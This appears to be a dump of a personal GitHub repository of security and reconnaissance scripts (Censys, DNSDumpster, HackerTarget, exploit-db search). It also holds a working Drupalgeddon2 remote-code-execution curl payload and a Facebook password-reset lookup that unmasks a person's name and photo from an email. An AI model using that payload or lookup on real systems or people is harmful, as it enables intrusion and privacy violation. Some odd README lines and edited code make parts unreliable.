├── Blacklist_IP_Check ├── Blacklist_IP_Check.py └── Readme.md ├── Censys_API ├── README.md └── censys.py ├── CloudBleed_Chrome_POC ├── README.md └── check.py ├── Cyberoam Login Automation Scripts ├── DNS_Dumpster ├── DNSDumpsterAPI.pyc └── dnsdumpster.py ├── Drupalgeddon2_CURL ├── Exploit-DB Search ├── README.md └── exploit-db-search ├── Facebook_OSINT ├── FacebookResetPasswordAPI.pyc ├── README.md └── facebook.py ├── HackerTarget_IP_Info_API ├── HackerTarget_API_TargetInfo.py └── readme.md ├── NetGear_Exploits ├── passwordrecovered_cgi_exploit.py └── passwrd_cgi_exploit.py ├── Offensive_Security_Red_Team_Library.md ├── Open_Phish ├── db_create.py ├── feed.txt ├── feed_1.txt ├── new.db ├── openphish_old.db └── openphish_websites_database.py ├── Penentration Testing_Scripts ├── Cheatsheets │ ├── Cheatsheet_AIXBuild.txt │ ├── Cheatsheet_AVBypass.txt │ ├── Cheatsheet_ApacheSSL.txt │ ├── Cheatsheet_AttackingMSSQL.txt │ ├── Cheatsheet_BashScripting.txt │ ├── Cheatsheet_BuildReviews.txt │ ├── Cheatsheet_CTF.txt │ ├── Cheatsheet_CiscoIOS.txt │ ├── Cheatsheet_CookieStealing.txt │ ├── Cheatsheet_DomainAdminExploitation.txt │ ├── Cheatsheet_ExploitDev.txt │ ├── Cheatsheet_GDB.txt │ ├── Cheatsheet_GPG.txt │ ├── Cheatsheet_HTTPBasicAuth.txt │ ├── Cheatsheet_IKEScan.txt │ ├── Cheatsheet_LinuxPrivilegeEsc.txt │ ├── Cheatsheet_LocalSamDump.txt │ ├── Cheatsheet_MSFPostExploitation.txt │ ├── Cheatsheet_Metasploit.pdf │ ├── Cheatsheet_MetasploitPayloads.txt │ ├── Cheatsheet_MobileAppTesting.txt │ ├── Cheatsheet_Networking.txt │ ├── Cheatsheet_OWASPCheckList.txt │ ├── Cheatsheet_Oracle.txt │ ├── Cheatsheet_PenTesting.txt │ ├── Cheatsheet_Pyinstaller.txt │ ├── Cheatsheet_Python.pdf │ ├── Cheatsheet_Remediations.txt │ ├── Cheatsheet_SMBCapture.txt │ ├── Cheatsheet_SMBEnumeration.txt │ ├── Cheatsheet_SMTPOpenRelay.txt │ ├── Cheatsheet_SQLInjection.txt │ ├── Cheatsheet_SSLStrip.txt │ ├── Cheatsheet_Solaris.txt │ ├── Cheatsheet_Tools.txt │ ├── Cheatsheet_UsefulCommands.txt │ ├── 
Cheatsheet_VOIP.txt │ ├── Cheatsheet_Vlans.txt │ ├── Cheatsheet_VulnVerify.txt │ ├── Cheatsheet_WindowsCommandLine.pdf │ ├── Cheatsheet_WirelessTesting.txt │ ├── Cheatsheet_XSS.txt │ ├── Cheatsheet_scp.txt │ └── README.md ├── Pentest_Tools │ ├── DNS_lookup.sh │ ├── README.md │ ├── SMTP_VRFY.sh │ ├── dns_zone_transfer.sh │ ├── forward_DNS.sh │ ├── list.txt │ ├── nmap_spam.sh │ ├── ping_sweep.sh │ ├── reverse_DNS.sh │ └── vrfy.py └── ftp_brute_force │ ├── ftp_brute_force.py │ ├── passwords.txt │ ├── requirements.txt │ └── users.txt ├── Python_3_Tutorials ├── 02 Quick Start │ ├── conditionals.py │ ├── exceptions.py │ ├── forloop.py │ ├── function.py │ ├── generator.py │ ├── hello.py │ ├── lines.txt │ ├── oop2.py │ ├── oop3.py │ ├── simpleoop.py │ └── whileloop.py ├── 04 Syntax │ ├── comments.py │ └── syntax.py ├── 05 Variables │ └── variables.py ├── 06 Conditionals │ ├── conditionals.py │ ├── jumptable.py │ └── switch.py ├── 07 Loops │ ├── for.py │ ├── iterators.py │ ├── lines.txt │ ├── loopcontrol.py │ └── while.py ├── 08 Operators │ └── ops.py ├── 09 Regexes │ ├── raven.txt │ └── regex.py ├── 10 Exceptions │ ├── exceptions.py │ └── lines.txt ├── 11 Functions │ ├── functions.py │ └── generator.py ├── 12 Classes │ ├── classes.py │ ├── decorators.py │ └── generator.py ├── 13 Strings │ ├── lines.txt │ └── strings.py ├── 14 Containers │ ├── containers.py │ └── utf8.txt ├── 15 Files │ ├── bigfile.txt │ ├── files.py │ ├── lines.txt │ └── olives.jpg ├── 16 Databases │ ├── databases.py │ ├── sqlite3-class.py │ └── sqlite3-crud.py ├── 17 Modules │ ├── modules.py │ ├── saytime.py │ ├── saytime.pyc │ └── web-saytime.py ├── 18 Debugging │ ├── incrange-errors.py │ ├── mvc-errors.py │ ├── saytime-errors.py │ ├── saytime.py │ └── test-saytime.py └── 19 Projects │ └── Extras │ └── RSS │ ├── rss.db │ ├── rss.py │ ├── rss.py~ │ ├── rssdb.py │ ├── rssdb.py~ │ ├── tkrss.py │ └── tkrss.py~ ├── README.md ├── SSH-Audit ├── LICENSE ├── README.md ├── ssh-audit.py └── test │ ├── conftest.py │ 
├── coverage.sh │ ├── mypy-py2.sh │ ├── mypy-py3.sh │ ├── mypy.ini │ ├── prospector.sh │ ├── prospector.yml │ ├── test_auditconf.py │ ├── test_banner.py │ ├── test_buffer.py │ ├── test_errors.py │ ├── test_output.py │ ├── test_software.py │ ├── test_ssh1.py │ ├── test_ssh2.py │ └── test_version_compare.py ├── Threat_Blacklisted_Collection ├── README.md ├── ThreatCollection_Blacklisted_BigData.py └── ThreatCollection_Blacklisted_Small.py ├── Threatfeeds-Automation └── RansomePaymentGatewayfeeds │ ├── Readme.md │ └── ransomepaymentfeeds.py ├── VirusTotal_Automation ├── Virustotal.py └── readme.md ├── Wordpress_Bruteforce_Scripts ├── WordpressLoginBruteforcer │ ├── h.py │ └── script.py └── WordpressPasswordBruteforcer │ ├── dic.txt │ └── script.py ├── email_hacked.py ├── escape_shell.py ├── haveibeenpwned.py ├── keylogger.py ├── linkden-company_employee-enumeration ├── README.md └── linkden_company_employee_enumeration.py ├── md5_crack_challenge ├── fuck.py ├── h.py ├── hash.txt ├── hashes.txt └── wordlist.txt ├── nmapslackscan.sh ├── salaries-flask-app ├── app.py └── salaries.db ├── shodan_ip_download.py ├── sslcert_verification.py └── trainings ├── Browser_auto-fill_security ├── autofill-demo.gif ├── index.html └── readme.md ├── Hellman.txt ├── Log Analysis ├── Apache_Log_Analyzer.zip ├── Apache_Log_Analyzer │ ├── Apache_Final.py │ ├── access_log_new │ ├── access_log_old │ └── log_report.html ├── Bose │ ├── Linux for Infosec People.txt │ ├── apache_log_analysis.txt │ ├── log_analysis_Intro.txt │ └── log_analysis_Intro1.txt ├── Python_Basics.txt ├── Trainings_LogAnalysis_Linuxforinfosec.tar ├── access_log ├── access_log_scan_report_from_Thu_04_Aug_2016_22_01_43 ├── apache_log_analysis.txt ├── awk.txt ├── cisco.log ├── cisco_loganalysis.txt ├── index.html ├── log_analysis_Intro.txt ├── log_analysis_Intro1.txt ├── new_log_analysis.txt ├── scan_log.py ├── sed.log └── soc.txt └── crypto ├── assmetrickey ├── file-enc-pubkey.txt ├── files.tar.gz ├── hell.txt ├── hell1.txt 
├── hell2.txt ├── hell22.txt └── hell3.txt ├── encryption_demo.txt ├── gpgdemo ├── hell.txt.gpg └── out.txt ├── hash.py ├── hashdemo └── hell.txt ├── openssl ├── aes │ ├── a.enc │ ├── a.txt │ ├── intro.txt │ ├── intro.txt~ │ └── output.txt ├── ca │ ├── intro.txt │ └── intro.txt~ ├── decrypt.txt ├── encrypt.dat ├── encrypt.txt ├── privatekey.pem └── pubkey.pem └── topics ├── aes ├── intro.txt ├── secrets.txt ├── secrets.txt.new └── serects.txt.enc ├── crypto_basic.txt ├── des └── a.txt ├── rc4 ├── a.py └── rc4.py └── xor.py /Blacklist_IP_Check/Readme.md: -------------------------------------------------------------------------------- 1 | ### IP Blacklist Check 2 | 3 | This Python script checks an IP against popular IP and DNS blacklists. 4 | 5 | # Usage 6 | python Blacklist_IP_Check.py 7 | 8 | # Important Notice 9 | *This will likely break your system.* 10 | -------------------------------------------------------------------------------- /Censys_API/README.md: -------------------------------------------------------------------------------- 1 | # censys 2 | A Simple Censys.io Python API Search 3 | 4 | # Running 5 | 6 | Searching Domain Name: 7 | python censys.py -f www.censys.io 8 | 9 | Searching Generic Terms: 10 | python censys.py -f censys 11 | 12 | Searching IP Space: 13 | python censys.py -f 216.239.32.0/24 14 | 15 | # Important Notice 16 | 17 | I am not a programmer. 
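# --------------------------------------------------------------------------------
# /Censys_API/censys.py:
# --------------------------------------------------------------------------------
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# Name: censys.py
# Purpose: Censys API Script

from termcolor import colored
import argparse
import json
import requests
import codecs
import locale
import os
import sys
import ast


class Censys:
    """Small client for the Censys v1 IPv4 ``search`` and ``view`` endpoints.

    Results are printed to stdout; nothing is returned to the caller.
    """

    # Seconds to wait for the API before giving up instead of hanging forever.
    TIMEOUT = 30

    def __init__(self, ip):
        """Remember the query and load the API credentials.

        Args:
            ip: Search expression passed to Censys (domain, term or CIDR).

        Raises:
            RuntimeError: if the API ID or secret is not set in the
                environment.
        """
        self.API_URL = "https://www.censys.io/api/v1"
        # Credentials are read from the environment so they never live in the
        # source tree. Any ID/secret value that was previously committed in
        # this file should be treated as exposed and rotated at Censys.
        self.UID = os.environ.get("CENSYS_API_ID", "")
        self.SECRET = os.environ.get("CENSYS_API_SECRET", "")
        if not (self.UID and self.SECRET):
            raise RuntimeError(
                "Set CENSYS_API_ID and CENSYS_API_SECRET in the environment")
        self.ip = ip

    def search(self):
        """Page through the IPv4 search results and print one line per host.

        Hosts that expose port 80 are additionally passed to ``view``.

        Raises:
            requests.HTTPError: if the API answers with an error status
                (for example rejected credentials or an exhausted quota).
        """
        page = 1
        pages = float('inf')  # real page count is known after the first reply

        while page <= pages:
            params = {'query': self.ip, 'page': page}
            res = requests.post(
                self.API_URL + "/search/ipv4",
                json=params,
                auth=(self.UID, self.SECRET),
                timeout=self.TIMEOUT,
            )
            # Fail with the HTTP status rather than a KeyError on 'results'.
            res.raise_for_status()
            payload = res.json()

            for r in payload['results']:
                ip = r["ip"]
                proto = [p.split("/")[0] for p in r["protocols"]]
                proto.sort(key=float)
                protoList = ','.join(map(str, proto))

                print('[%s] IP: %s - Protocols: %s'
                      % (colored('*', 'red'), ip, protoList))

                # Test list membership, not the joined string: a substring
                # test would also fire for ports such as 8080 or 180.
                if '80' in proto:
                    self.view(ip)

            pages = payload['metadata']['pages']
            page += 1

    def view(self, server):
        """Print the HTTP title and Server header recorded for ``server``.

        Best effort: a host record without the expected port-80 fields is
        reported and skipped so the surrounding search can continue.
        """
        res = requests.get(
            self.API_URL + ("/view/ipv4/%s" % server),
            auth=(self.UID, self.SECRET),
            timeout=self.TIMEOUT,
        )
        payload = res.json()

        try:
            http_get = payload['80']['http']['get']
            # Title and Server are supplied by the scanned host; treat them
            # as untrusted text wherever this output is consumed.
            if 'title' in http_get:
                print("[+] Title: %s" % http_get['title'])
            if 'server' in http_get['headers']:
                print("[+] Server: %s" % http_get['headers']['server'])
        except (KeyError, TypeError) as error:
            print(error)


# Only parse the command line when run as a script, so importing the module
# has no side effects.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CENSYS.IO Web Server Search')
    parser.add_argument('-f', '--find', help='CENSYS Search', required=True)

    args = parser.parse_args()
    ip = args.find

    censys = Censys(ip)
    censys.search()

# --------------------------------------------------------------------------------
# /CloudBleed_Chrome_POC/README.md:
# --------------------------------------------------------------------------------
# This project is in response to the silly-named, but scary CloudFront CDN
# issue currently unfolding. While it is very possible that your data is
# secure if you use a site on this list:
# https://github.com/pirate/sites-using-cloudflare a good chunk were verified
# to have had sensitive data exposed - including passwords, logins, personal
# information, etc.
#
# As always when something like this comes about, change your passwords. This
# one is difficult because CloudFront is a massive player in this space so
# many, many sites were affected. Just because a site is on the list does not
# mean the sensitive parts of the site were, just because the sensitive parts
# were does not mean that *your* data was, etc. Still, this involves data that
# may still be cached/present, and it's worth the time to change your
# passwords if this affects you.
#
# This is a good time to put in a big plug for a good password management
# system. Lastpass and 1password have excellent apps as do many others.
#
# To do see what I needed to change I exported my Chrome password file, then
# wrote this script to dump out anything I had affected.
#
# To export Chrome passwords:
#
# 1. Open Chrome://flags in your Chrome.
# 2. Find Password Import and Export option, select Enabled from the drop-down
#    box, and then restart the Chrome browser.
# 3. Now, open Chrome://settings/passwords page.
# 4. Click on Export button to export/backup saved passwords.'
#
# NOTE(review): the linked list is named "sites-using-cloudflare"; "CloudFront"
# in the text above presumably refers to Cloudflare - confirm.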
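# /CloudBleed_Chrome_POC/README.md (continued)
#
# Steps from: www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/
#
# Requirements:
#
# 1. OSX, or Linux environments.
# 2. Python 2.7 or later.
# 3. Existing /tmp/password.csv from the above steps.
# 4. check.py from this project existing in /tmp/check.py
#
# Download checker.py from here, and run it. It will download, unzip, and
# compare only the website name (with a little formatting) against the
# affected list. This password file should be *deleted* as soon as you are
# done (the script will not do this for you), and if in doubt - change any
# credentials that may have been revealed. Don't trust that the master list is
# valid, or that my novice attempts to deal with this didn't miss something
# important.
# --------------------------------------------------------------------------------
# /CloudBleed_Chrome_POC/check.py:
# --------------------------------------------------------------------------------
#!/bin/python
#Team: r3b00t
#Author: P3t3rp4rk3r
#
# Compare the site names in an exported Chrome password CSV with the published
# list of affected sites and collect the names found in both.
import os
from io import BytesIO
try:
    from urllib2 import urlopen          # Python 2
except ImportError:
    from urllib.request import urlopen   # Python 3
from zipfile import ZipFile

# The export holds every saved credential in plain text, and /tmp is shared
# with other local users: restrict the file's permissions while it exists and
# delete it as soon as the check is done.
pass_file = '/tmp/password.csv'
# Path of the cached site list. It has its own name so that it is not
# overwritten by the `sites` collection below; sharing one name made the
# isfile() and open() calls receive a list instead of a path.
sites_file = '/tmp/list.csv'
vulnsites = 'https://github.com/pirate/sites-using-cloudflare/archive/master.zip'
list_member = 'sites-using-cloudflare-master/sorted_unique_cf.txt'
pw_list = []
sites = set()

# Download the archive once and keep only the sorted site list from it.
if not os.path.isfile(sites_file):
    archive = urlopen(vulnsites).read()
    with ZipFile(BytesIO(archive)) as zf:
        listing = zf.read(list_member)
    with open(sites_file, 'wb') as out:
        out.write(listing)

# A set keeps the membership test cheap for a list of this size.
with open(sites_file, 'r') as f:
    for line in f:
        sites.add(line.rstrip())

with open(pass_file, 'r') as f:
    for line in f:
        # Only the first CSV column (the site) is used; the credential
        # columns are never stored. Both URL schemes are stripped, since an
        # entry saved with https:// would otherwise never match the list and
        # be reported as unaffected.
        newline = line.split(',')[0].lower().rstrip()
        newline = newline.replace('https://', '').replace('http://', '')
        newline = newline.replace('www.', '')
        pw_list.append(newline)

# Saved sites that also appear on the affected list.
result = sorted(set(pw_list) & sites)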
print(result) 34 | 35 | -------------------------------------------------------------------------------- /Cyberoam Login Automation Scripts: -------------------------------------------------------------------------------- 1 | # Cyberoam Web Access URL 2 | link="http://192.168.1.1:8090/login.xml" 3 | 4 | ######################## 5 | # Constant Hidden Form Fields 6 | isAccessDenied="" 7 | url="" 8 | message="" 9 | saveinfo="saveinfo" 10 | timestamp="$(date +%s)" 11 | ######################## 12 | # Variable Hidden Form Fields 13 | mode="193" 14 | btnSubmit="Logout" 15 | 16 | ####################### 17 | # Login session check and using CLI cURL to send post data to logout Cyberoam 18 | if ls ~/.cyberoam-login.tmp &> /dev/null 19 | then 20 | source ~/.cyberoam-login.tmp 21 | 22 | zenity --question --title="Cyberoam Login" \ 23 | --text="You are logged in Cyberoam. \n\n\n Status \t\t Logged In \n Username \t $username" \ 24 | --ok-label "Logout" --cancel-label="Close" \ 25 | --width=300 --height=150 \ 26 | ; opt=`echo $?` 27 | 28 | if [ $opt -eq 1 ] 29 | then 30 | exit 31 | else 32 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data mode="$mode" --data producttype="0" --data btnSubmit="$btnSubmit" --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" -k &> ~/.cyberoam-log.tmp 33 | 34 | if grep "logoutstatus=true" ~/.cyberoam-log.tmp > /dev/null 35 | then 36 | rm -f ~/.cyberoam-log.tmp ~/.cyberoam-login.tmp 37 | exit 38 | fi 39 | fi 40 | fi 41 | 42 | ######################## 43 | # Variable Hidden Form Fields 44 | mode="191" 45 | btnSubmit="Login" 46 | 47 | ######################## 48 | # Login Variables Input 49 | if [ $# -eq 2 ] 50 | then 51 | username="$1" 52 | password="$2" 53 | else 54 | username=`zenity --entry --title="Cyberoam Login" --width=300 --height=150 \ 55 | --text="Enter Username"` 56 | 57 | if [ -z $username ] 58 | then 59 | exit 60 | fi 61 | 62 | 
password=`zenity --entry --title="Cyberoam Login" --width=300 --height=150 \ 63 | --text="Enter Password" --hide-text` 64 | 65 | if [ -z $password ] 66 | then 67 | exit 68 | fi 69 | fi 70 | 71 | ####################### 72 | # Using CLI cURL to send post data to login Cyberoam 73 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data producttype="0" \ 74 | --data mode="$mode" --data btnSubmit="$btnSubmit" \ 75 | --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" \ 76 | -k &> ~/.cyberoam-log.tmp 77 | 78 | cnt=0 79 | 80 | while grep "loginstatus=false" ~/.cyberoam-log.tmp > /dev/null 81 | do 82 | curl $link --data username="$username" --data password="$password" --data a="$timestamp" --data producttype="0" \ 83 | --data mode="$mode" --data btnSubmit="$btnSubmit" \ 84 | --data isAccessDenied="$isAccessDenied" --data url="$url" --data message="$message" --data saveinfo="$saveinfo" \ 85 | -k &> ~/.cyberoam-log.tmp 86 | 87 | cnt=`expr $cnt + 1` 88 | 89 | if [ $cnt -ge 5 ] 90 | then 91 | break 92 | fi 93 | done 94 | 95 | if grep "loginstatus=true" ~/.cyberoam-log.tmp > /dev/null 96 | then 97 | echo "username=$username" >> ~/.cyberoam-login.tmp 98 | 99 | zenity --info --title="Cyberoam Login" \ 100 | --text="You are logged in Cyberoam. 
\n\n\n Status \t\t Logged In \n Username \t $username" \ 101 | --width=300 --height=150 102 | else 103 | var=`grep "loginstatus" ~/.cyberoam-log.tmp | awk '{ print $2 }'` 104 | len2=`echo ${var:88} | wc -c` 105 | 106 | len_msg=`expr $len2 - 62` 107 | 108 | msg=`echo ${var:89:$len_msg}` 109 | err=`echo $msg | sed 's/+/ /g' | sed 's/%2C/,/g'` 110 | 111 | zenity --info --title="Cyberoam Login" \ 112 | --text="$err" \ 113 | --width=300 --height=150 114 | fi 115 | -------------------------------------------------------------------------------- /DNS_Dumpster/DNSDumpsterAPI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/DNS_Dumpster/DNSDumpsterAPI.pyc -------------------------------------------------------------------------------- /DNS_Dumpster/dnsdumpster.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | from DNSDumpsterAPI import DNSDumpsterAPI 5 | 6 | a = raw_input("Enter the target:") 7 | res = DNSDumpsterAPI(False).search(a) 8 | #print res 9 | print "[+] Domain " 10 | print res['domain'] 11 | 12 | print "[+] DNS Servers" 13 | for entry in res['dns_records']['dns']: 14 | print("{domain} {ip} {as} {provider} {country} {header}".format(**entry)) 15 | 16 | print "{+} MX Records" 17 | for entry in res['dns_records']['mx']: 18 | print("{domain} ({ip}) {as} {provider} {country} {header}".format(**entry)) 19 | 20 | print "[+] Host Records" 21 | 22 | for entry in res['dns_records']['host']: 23 | if entry['reverse_dns']: 24 | print("{domain} ({reverse_dns}) ({ip}) {as} {provider} {country} {header}".format(**entry)) 25 | else: 26 | print("{domain} ({ip}) {as} {provider} {country} {header}".format(**entry)) 27 | 28 | print "[+] TXT Records" 29 | 30 | for entry in res['dns_records']['txt']: 31 | 
print entry 32 | 33 | print "[+] Image Save" 34 | image_retrieved = res['image_data'] is not None 35 | print "\n\n\nRetrieved Network mapping image? {} (accessible in 'image_data')".format(image_retrieved) 36 | #print repr(res['image_data'].decode('base64')[:20]) + '...' 37 | print "Created"+a+".png" 38 | open(a+'.png','wb').write(res['image_data'].decode('base64')) 39 | print "[+] Image Saved Successfully ..!!!" 40 | 41 | 42 | print "[+] XLSX File" 43 | 44 | xls_retrieved = res['xls_data'] is not None 45 | print "\n\n\nRetrieved XLS hosts? {} (accessible in 'xls_data')".format(xls_retrieved) 46 | #print repr(res['xls_data'].decode('base64')[:20]) + '...' # to save it somewhere else. 47 | print "Created"+a+".xlsx" 48 | open(a+'.xlsx','wb').write(res['xls_data'].decode('base64')) 49 | print "[+] XLSX Saved Successfully ..!!!" 50 | -------------------------------------------------------------------------------- /Drupalgeddon2_CURL: -------------------------------------------------------------------------------- 1 | curl -X POST --data \ 2 | 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()' \ 3 | 'https://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 4 | -------------------------------------------------------------------------------- /Exploit-DB Search/README.md: -------------------------------------------------------------------------------- 1 | # Exploit-DB-search 2 | 3 | ``` 4 | $ ./exploit-db-search 5 | exploit-db-search - 6 | Usage: exploit-db-search [options] [str1 [str2] ... 
[strN]] 7 | Example: exploit-db-search linux root 8 | exploit-db-search php sql 9 | exploit-db-search -s php Sql 10 | exploit-db-search -h 11 | Options: 12 | -s Case sensitive search 13 | -h Show help screen 14 | -u Update exploit database 15 | -q Quiet search; does not give verbose output 16 | ``` 17 | 18 | ``` 19 | ./exploit-db-search phpD windows local 20 | ------------------------------------------------------------------------------------------------------------------------------------------------ 21 | Title | Github URL | exploit-db URL 22 | ------------------------------------------------------------------------------------------------------------------------------------------------ 23 | phpDEV5 - System-Call Local Denial of Service Exploit | https://github.com/offensive-security/exploit-database/blob/master/platforms/windows/dos/888.txt | http://www.exploit-db.com/exploits/888 24 | 25 | ------------------------------------------------------------------------------------------------------------------------------------------------ 26 | 27 | -------------------------------------------------------------------------------- /Exploit-DB Search/exploit-db-search: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Search Exploit-db tool 3 | 4 | exploit_remote="https://raw.githubusercontent.com/offensive-security/exploit-database/master/files.csv" 5 | exploit_list_file="files.csv" 6 | prog=$(basename $0) 7 | default_err="Unknown error occurred" 8 | desc="An exploit database search tool" 9 | author="techgaun" 10 | version="0.1" 11 | red='\033[0;31m' 12 | green='\033[0;32m' 13 | nc='\033[0m' 14 | casesearch=false 15 | quiet=false 16 | search_strs= 17 | 18 | error() { 19 | msg="${1:-$default_err}" 20 | echo -e "${red}${msg}${nc}" 21 | exit 1 22 | } 23 | 24 | msg() { 25 | msg="${1:-nothing}" 26 | echo -e "${green}${msg}${nc}" 27 | } 28 | 29 | usage() { 30 | echo >&2 "${prog} - written by ${author} 31 | Usage: ${prog} 
[options] [str1 [str2] ... [strN]] 32 | Example: ${prog} linux root 33 | ${prog} php sql 34 | ${prog} -s php Sql 35 | ${prog} -h 36 | Options: 37 | -s Case sensitive search 38 | -h Show help screen 39 | -u Update exploit database 40 | -q Quiet search; does not give verbose output 41 | " 42 | exit 0 43 | } 44 | 45 | sploit_init() { 46 | if [[ ! -f "${exploit_list_file}" ]]; then 47 | msg "Updating exploit database" 48 | if ! wget "${exploit_remote}" -O "${exploit_list_file}" > /dev/null 2>&1; then 49 | rm -f "${exploit_list_file}" 50 | error "Could not download exploit database" 51 | fi 52 | msg "Updated exploit database" 53 | fi 54 | } 55 | 56 | update() { 57 | rm -f "${exploit_list_file}" && sploit_init 58 | exit 0 59 | } 60 | 61 | main() { 62 | local OPTIND 63 | if [[ "$#" -eq 0 ]]; then 64 | usage 65 | fi 66 | sploit_init 67 | ARGS="-" 68 | for param in $@; do 69 | if [[ "${param:0:1}" == "-" ]]; then 70 | ARGS=${ARGS}${param:1} 71 | shift 72 | continue 73 | fi 74 | search_strs=("/${param}/ && ${search_strs}") 75 | done 76 | 77 | while getopts ":shuq" opt ${ARGS}; do 78 | case ${opt} in 79 | h) usage;; 80 | s) casesearch=true;; 81 | u) update;; 82 | q) quiet=true;; 83 | \?) usage;; 84 | esac 85 | done 86 | 87 | shift $(( $OPTIND - 1 )) 88 | ignore_case="BEGIN {IGNORECASE = 1} " 89 | if ${casesearch}; then 90 | ignore_case= 91 | fi 92 | search_strs=$(sed 's/ &&$//' <<< ${search_strs}) 93 | result=$(awk "${ignore_case}${search_strs}" < ${exploit_list_file}) 94 | if [[ "x${result}" == "x" ]]; then 95 | error "No such exploit found" 96 | fi 97 | width=$(tput cols) 98 | reduced_width=$((width - 3)) 99 | desc_col=$((${reduced_width} / 3)) 100 | git_col=$((${reduced_width} / 3)) 101 | exploitdb_col=$((${reduced_width}/3)) 102 | 103 | printf "%0.s-" $(eval echo {1..${width}}) 104 | if ! 
${quiet}; then 105 | printf "\n%-${desc_col}s|%-${git_col}s|%-${exploitdb_col}s" " Title" " Github URL " " exploit-db URL " 106 | echo 107 | printf "%0.s-" $(eval echo {1..${width}}) 108 | git_base_url="https://github.com/offensive-security/exploit-database/blob/master/" 109 | exploitdb_url="http://www.exploit-db.com/exploits/" 110 | echo 111 | while read line; do 112 | awk -F "\"*,\"*" '{ printf "%s | '${git_base_url}'%s | '${exploitdb_url}'%s\n", $3, $2, $1}' <<< "${line}" 113 | done <<< "${result}" 114 | else 115 | exploit_path=40 116 | desc_col=$((${reduced_width} - ${exploit_path})) 117 | printf "\n%0-${desc_col}s|%0-${exploit_path}s" " Title" " Path" 118 | echo 119 | printf "%0.s-" $(eval echo {1..${width}}) 120 | desc_col=$((${desc_col} - 1)) 121 | echo 122 | while read line; do 123 | awk -F "\"*,\"*" '{ printf "%-'${desc_col}'s | %s\n", $3, $2 }' <<< "${line}" 124 | done <<< "${result}" 125 | fi 126 | echo 127 | printf "%0.s-" $(eval echo {1..${width}}) 128 | } 129 | 130 | main "$@" 131 | -------------------------------------------------------------------------------- /Facebook_OSINT/FacebookResetPasswordAPI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Facebook_OSINT/FacebookResetPasswordAPI.pyc -------------------------------------------------------------------------------- /Facebook_OSINT/README.md: -------------------------------------------------------------------------------- 1 | Facebook Reset Password API 2 | ================ 3 | 4 | Quick utility to retrieve full display name and profile picture from a simple e-mail address (if the privacy settings have not been configured properly). 
5 | 6 | Usage 7 | ====== 8 | 9 | ```python 10 | #!/bin/python 11 | # coding: utf-8 12 | 13 | from FacebookResetPasswordAPI import FacebookResetPasswordAPI 14 | res = FacebookResetPasswordAPI({'verbose': True}).get('email@domail.com') 15 | print res # retrieves the results 16 | ``` 17 | 18 | And the result looks something like: 19 | 20 | ``` 21 | [verbose] Token retrieved: AVpvxQbb 22 | [verbose] jsdatr retrieved: UPrlVd-aKAWKxxxXAAPwJ7wz 23 | {'profile_picture': 'https://www.facebook.com/profile/pic.php?cuid=AYhEUfs4ayVJXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'full_name': u'Paul XXXXXXXXXX'} 24 | ``` 25 | 26 | -------------------------------------------------------------------------------- /Facebook_OSINT/facebook.py: -------------------------------------------------------------------------------- 1 | from FacebookResetPasswordAPI import FacebookResetPasswordAPI 2 | a = raw_input("email:") 3 | res = FacebookResetPasswordAPI({'verbose': True}).get(a) 4 | print res # retrieves the results 5 | -------------------------------------------------------------------------------- /HackerTarget_IP_Info_API/HackerTarget_API_TargetInfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Santhosh Baswa" 3 | __copyright__ = "Copyright 2016, Independent Security Researcher" 4 | 5 | import os 6 | import sys 7 | import json 8 | import urllib 9 | import urllib2 10 | import hashlib 11 | import argparse 12 | import re 13 | import socket 14 | from urllib2 import urlopen 15 | 16 | 17 | def color(text, color_code): 18 | if sys.platform == "win32" and os.getenv("TERM") != "xterm": 19 | return text 20 | 21 | return '\x1b[%dm%s\x1b[0m' % (color_code, text) 22 | 23 | 24 | def red(text): 25 | return color(text, 31) 26 | 27 | def blue(text): 28 | return color(text, 34) 29 | 30 | 31 | 32 | if __name__ == "__main__": 33 | 34 | my_ip = raw_input("Enter the IP Address:") 35 | 36 | print(blue('Get Reverse DNS, GeoIP, NMAP, 
Traceroute and pulls HTTP Headers for an IP address')) 37 | print(blue('A quick and dirty script by @jgamblin')) 38 | print('\n') 39 | print(red('Your Target IP address is {0}'.format(my_ip))) 40 | print('\n') 41 | 42 | #Get IP To SCAN 43 | 44 | resp = raw_input(blue('Would you like target info about {0}? (Y/N):'.format(my_ip))) 45 | 46 | if resp.lower() in ["yes", "y"]: 47 | badip = my_ip 48 | else: 49 | badip = raw_input(blue("What IP would you like to check?: ")) 50 | 51 | print('\n') 52 | 53 | #IP INFO 54 | reversed_dns = urllib.urlopen('http://api.hackertarget.com/reverseiplookup/?q=' + badip).read() 55 | geoip = urllib.urlopen('http://api.hackertarget.com/geoip/?q=' + badip).read() 56 | nmap = urllib.urlopen('http://api.hackertarget.com/nmap/?q=' + badip).read() 57 | httpheaders = urllib.urlopen('http://api.hackertarget.com/httpheaders/?q=' + badip).read() 58 | tracert = urllib.urlopen('http://api.hackertarget.com/mtr/?q=' + badip).read() 59 | 60 | print(red('Reverse DNS Information:')) 61 | print(blue(reversed_dns)) 62 | print('\n') 63 | print(red('GEOIP Information:')) 64 | print(blue(geoip)) 65 | print('\n') 66 | print(red('NMAP of Traget (Only Ports: 21,25,80 and 443):')) 67 | print(blue(nmap)) 68 | print('\n') 69 | print(red('HTTP Headers:')) 70 | print(blue(httpheaders)) 71 | print('\n') 72 | print(red('Trace Route:')) 73 | print(blue(tracert)) 74 | print('\n') 75 